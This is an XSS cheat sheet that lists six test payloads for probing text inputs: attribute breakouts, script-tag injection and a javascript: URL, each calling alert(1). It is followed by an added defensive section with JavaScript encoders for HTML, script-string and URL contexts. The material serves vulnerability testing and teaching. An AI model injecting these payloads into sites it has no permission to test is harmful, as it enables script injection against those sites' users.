XSS

Enter these strings in a text input to check whether the web page is vulnerable to XSS.

Some payloads

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Bypass htmlentities() / htmlspecialchars()
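
From the defending side, the strings above each target a different output context (HTML markup, a quoted attribute, a script string, a URL), so a single HTML-entity encoder in the style of htmlspecialchars() does not cover all of them. The following is an added example, not code from the original page; the function names are illustrative and the base URL is a placeholder.

```javascript
// Added example: context-specific output encoders, run against the page's test strings.
// Function names are illustrative, not from any library.
const PAYLOADS = [
  '"><img src onerror=alert(1)>',
  '"autofocus onfocus=alert(1)//',
  '</script><script>alert(1)</script>',
  "'-alert(1)-'",
  "\\'-alert(1)//",
  'javascript:alert(1)',
];

const HTML_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// HTML body text and quoted attribute values (comparable to htmlspecialchars with ENT_QUOTES).
// Not sufficient on its own for script or URL contexts: entities placed in an
// event-handler attribute are decoded before the script runs, and a URL scheme
// contains none of these characters.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_MAP[c]);
}

// Value placed inside a JavaScript string literal: everything outside a small
// safe set becomes \uXXXX, so quotes, backslashes and "</script>" cannot appear.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 _.,]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// href/src values: allow only http(s) (relative URLs resolve against the
// placeholder base), then HTML-escape for the attribute. Anything else becomes "#".
function safeUrl(s) {
  const v = String(s).trim();
  try {
    const scheme = new URL(v, 'https://base.invalid/').protocol;
    if (scheme !== 'http:' && scheme !== 'https:') return '#';
  } catch (e) {
    return '#';
  }
  return escapeHtml(v);
}

// Encode every test string for each context so the outputs can be compared.
function audit() {
  return PAYLOADS.map((p) => ({
    payload: p, html: escapeHtml(p), js: escapeJsString(p), url: safeUrl(p),
  }));
}

console.table(audit());
```

In the table, the last test string passes through `escapeHtml` unchanged, which is why URL attributes need the scheme check rather than entity encoding alone.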
